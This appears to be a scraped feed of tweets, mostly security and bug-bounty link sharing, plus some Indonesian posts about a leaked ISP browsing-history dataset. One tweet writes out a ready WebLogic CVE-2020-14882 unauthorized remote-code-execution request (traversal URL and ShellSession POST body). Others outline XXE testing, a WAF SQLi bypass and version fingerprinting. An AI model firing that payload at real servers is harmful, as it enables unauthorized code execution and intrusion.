tiara 

Can you spot the vulnerability? 🔎 Show us how you'd create an admin account in the comments 👇 The best explanation gets a 25€ SWAG voucher! 👕

change username to @ReconOne_

Persistent PHP payloads in PNGs: How to inject PHP code in an image – and keep it there ! #infosec #cybersecurity #redteam #pentest #pentesting #hacking #hackers #coding #opensource #Linux #windows #DFIR #macOS #platform synacktiv.com/publications/p…

Tahun 2020 kemarin kita berhasil menekan @IndiHome untuk mematikan tracker milik mereka yang selama ini digunakan untuk mencuri browsing history milik pelanggan. Sekarang 26 juta browsing history yang dicuri itu bocor dan dibagikan gratis. Ternyata berikut dengan nama dan NIK 🙂

Hunting CSRF: An attacker’s perspective:✅ 👇 💣 #bugbountytips #infosec

@Telkomsel Hi, kok banyak yang hubungi saya padahal kan nomor baru kok bisa banyak nomor asing, pas regis ke wa pun gitu banyak chat yang masuk

[4/n] 2. Convert the content-type to XML using the "Content-Type Converter" Burp Extension. 3. Process the Request and if the request is processed successfully, it means that the XML parsing is supported. 4. Now, attempt to exploit XXE Interesting Read: netspi.com/blog/technical…

@utmman bikin pendeteksi jodoh

🤲🤲

@Cloudflare huff

Introducing Cloudflare Email Routing: designed to simplify the way you create and manage email addresses, without needing to keep an eye on additional mailboxes. cfl.re/3i6ez43 #BirthdayWeek🎂

depends from person to person as something difficult for me can be easy for someone else and vice-versa

@Pethuraj looks like your workflow means nothing

Red Team Toolkit 🧰 - An Open-Source Django Offensive Web-App that contains useful offensive tools used in the red-teaming activity. » github.com/signorrayan/Re… #cybersecurity #infosec #security #cyber #informationsecurity #redteam #redteaming #bugbounty #bugbountytips

Just published a write-up on Account Takeover due to OAuth Misconfiguration + CSRF + XSS and Weak CSP. blog.dixitaditya.com/2021/11/19/acc… #Pentesting #hacking #cybersecurity #infosec #bugbounty #bugbountytips

Query the gitbla version number through the css file name and build a database index Example：gitlab/gitlab-ce:13.9.5-ce.0 application-d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb.css fofa.so/result?qbase64… censys.io/blog/cve-2021-…

#CVE-2020–14882 Weblogic Unauthorized bypass RCE http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal POST: _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22) testbnull.medium.com/weblogic-rce-b…

Pretty interesting writeup on bypassing ModSecurity WAF for SQLi. 🌟"When MySQL sees 1.e(abc), it will ignore the 1.e( portion because the following characters do not form a valid numeric value."🌟 blog.h3xstream.com/2021/10/bypass… #bugbountytips #bugbounty #infosec #cybersecurity

@sansforensics I need a free course 😂

#FOR500 Windows Forensic Analysis builds in-depth and comprehensive digital forensics knowledge of Microsoft Windows operating systems by analyzing and authenticating forensic data. Try the course demo: sans.org/u/1aWA Learn more: sans.org/u/1aWK

@SecuritySatch @PentesterLab @snyff I saw his post on linkedin, and make me to move forward

@z0idsec I want to join but my application has been rejected

So so, happy to almost be part of the Synack Red Team. @SynackRedTeam

ChopChop is a CLI to help developers scanning endpoints and identifying exposition of sensitive services/files/folders. github.com/michelin/ChopC…